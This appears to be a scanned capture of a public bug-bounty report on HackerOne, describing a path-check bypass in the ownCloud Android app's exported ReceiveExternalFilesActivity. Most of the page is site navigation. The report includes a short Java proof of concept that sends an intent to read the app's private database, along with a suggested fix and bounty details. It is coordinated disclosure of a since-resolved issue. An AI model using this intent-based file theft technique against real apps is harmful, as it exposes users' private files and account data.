hackerone.com Open in urlscan Pro
2606:4700::6810:6434  Public Scan

Form analysis
0 forms found in the DOM

Text Content

 * solutions
   
   solutions
   
   
   
   SOLUTIONS
   
    * Attack Resistance Management
    * Vulnerability Management
    * Cloud Security
    * Application Security
   
   
   INDUSTRIES
   
    * Financial Services
    * Government
    * US Federal
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * products
   
   products
   
   
   
   EXPLORE PRODUCTS
   
    * Platform Overview
    * HackerOne Bounty
    * HackerOne Assets
    * HackerOne Response (VDP)
    * HackerOne Services
    * HackerOne Insights
    * HackerOne Assessments
    * HackerOne Pentests
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * partners
   
   partners
   
   
   
   PARTNERS
   
    * Partner Overview
    * Integrations
    * AWS
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * company
   
   company
   
   
   
   COMPANY
   
    * About us
    * Leadership
    * Careers
    * Trust
   
   
   IN THE NEWS
   
    * Press
    * Press Releases
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * hackers
   
   hackers
   
   
   
   FOR HACKERS
   
    * Hackers
    * Hacker101
    * Hacktivity
    * Opportunities
    * Leaderboard
    * h@cktivitycon
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * resources
   
   resources
   
   
   
   RESOURCES
   
    * Resource Center
    * Documentation
    * Meet our Successful Customers
    * Events
    * Security@ Conference
   
   
   KNOWLEDGE CENTER
   
    * Application Security
    * Attack Surface
    * Cloud Security
    * Cybersecurity Attacks
    * DevSecOps
    * Vulnerability Assessment
    * Penetration Testing
    * OWASP
   
   
   BLOG CATEGORIES
   
    * Blog
    * Application Security
    * Company News
    * Ethical Hacker
    * Penetration Testing
    * Security Compliance
    * Vulnerability Management
    * Community
   
   Contact Us
   
   Contacted by a hacker?
   
   Login
   
 * Contact Us
   
   Contacted by a hacker?
   
   Login




TOP BAR

 * Login
 * Contacted by a hacker?
 * Contact Us

solutions


SOLUTIONS

 * Attack Resistance Management
   
   Understand your attack surface, test proactively, and expand your team.

 * Vulnerability Management
   
   Fortify your current program with comprehensive security testing.

 * Cloud Security
   
   Protect your cloud environment against multiple threat vectors.

 * Application Security
   
   Integrate continuous security testing into your SDLC.


INDUSTRIES

 * Financial Services
 * Government
 * US Federal

products


EXPLORE PRODUCTS

 * Platform Overview
   
   The security testing platform that never stops.

 * HackerOne Bounty
   
   Uncover critical vulnerabilities that conventional tools miss.

 * HackerOne Assets
   
   Attack surface management informed by hacker insights.

 * HackerOne Response (VDP)
   
   Reduce risk with a vulnerability disclosure program (VDP).

 * HackerOne Services
   
   Mature your security readiness with our advisory and triage services.

 * HackerOne Insights
   
   View program performance and vulnerability trends.

 * HackerOne Assessments
   
   Assess, remediate, and secure your cloud, apps, products, and more.

 * 
 * 
 * HackerOne Pentests
   
   Meet vendor and compliance requirements with a global community of skilled
   pentesters.

partners


PARTNERS

 * Partner Overview
   
   Explore our technology, service, and solution partners, or join us.

 * Integrations
   
   Integrate and enhance your dev, security, and IT tools.

 * AWS
   
   Protect your cloud environment with AWS-certified security experts.

company


COMPANY

 * About us
   
   We empower the world to build a safer internet.

 * Leadership
   
   Meet the team building an inclusive space to innovate and share ideas.

 * Careers
   
   Want to make the internet safer, too? Join us!

 * Trust
   
   Earning trust through privacy, compliance, security, and transparency.


IN THE NEWS

 * Press
 * Press Releases

hackers


FOR HACKERS

 * Hackers
   
   Hack, learn, earn. See what the HackerOne community is all about.

 * Hacker101
   
   Free videos and CTFs that connect you to private bug bounties.

 * Hacktivity
   
   Watch the latest hacker activity on HackerOne.

 * Opportunities
   
   Find disclosure programs and report vulnerabilities.

 * Leaderboard
   
   See the top hackers by reputation, geography, OWASP Top 10, and more.

 * h@cktivitycon
   
   Join the virtual conference for the hacker community, by the community.

resources


RESOURCES

 * Resource Center
   
   The latest news, insights, stories, blogs, and more.

 * Documentation
   
   Explore our product features.

 * Meet our Successful Customers
   
   Customers all over the world trust HackerOne to scale their security. See how
   they succeed.

 * Events
   
   Join us for an upcoming event or watch a past event.

 * 
 * 
 * Security@ Conference
   
   Our annual conference. A security conference like no other.


KNOWLEDGE CENTER

 * Application Security
 * Attack Surface
 * Cloud Security
 * Cybersecurity Attacks
 * DevSecOps
 * Vulnerability Assessment
 * Penetration Testing
 * OWASP


BLOG CATEGORIES

 * Blog
 * Application Security
 * Company News
 * Ethical Hacker
 * Penetration Testing
 * Security Compliance
 * Vulnerability Management
 * Community


Created with Sketch.
111
#377107
Possible to steal any protected files on Android
 * Share:
 * 
 * 
 * 
 * 
 * 
 * 

Timeline
shell_c0de
submitted a report to ownCloud.
Jul 4th (5 years ago)
MenuMenu
Hi. I have found an issue which allows to retrieve any files from
/data/data/com.owncloud.android/* directory. The problem is in exported activity
com.owncloud.android.ui.activity.ReceiveExternalFilesActivity which accepts a
URI to download files. I see that you've added verification path /data/data/ You
can bypass the verification using specifying an alternative path:
/data/user/0/com.owncloud.android/ Malicious code:
Code 569 BytesWrap lines Copy Download
1 StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder(); 2
StrictMode.setVmPolicy(builder.build()); 3 Intent intent = new
Intent("android.intent.action.SEND"); 4
intent.setClassName("com.owncloud.android",
"com.owncloud.android.ui.activity.ReceiveExternalFilesActivity"); 5
intent.setType("*/*"); 6 intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
7 intent.putExtra("android.intent.extra.STREAM",
Uri.parse("file:///data/user/0/com.owncloud.android/databases/filelist")); 8
startActivity(intent);


HOW TO FIX

Add an alternative path to the folder check


IMPACT

This vulnerability can get a complete account, malware can access everything,
including, file database and history.
 * 3 attachments:
 * F315553: owncloud_PoC.apk
 * F315557: 2VkPnMdf2YY.jpg
 * F315558: td0jJcli45Y.jpg





Reported July 4, 2018 1:55pm +0000


shell_c0de

Participants


State
Resolved ()

Reported to
ownCloud


--------------------------------------------------------------------------------

Disclosed
November 15, 2021 8:40am +0000

Severity
Medium (4 ~ 6.9)

Weakness
Information Disclosure

Bounty
$750

Time spent
None


--------------------------------------------------------------------------------

CVE ID
None

Account de...
None


--------------------------------------------------------------------------------


It looks like your JavaScript is disabled. To use HackerOne, enable JavaScript
in your browser and refresh this page.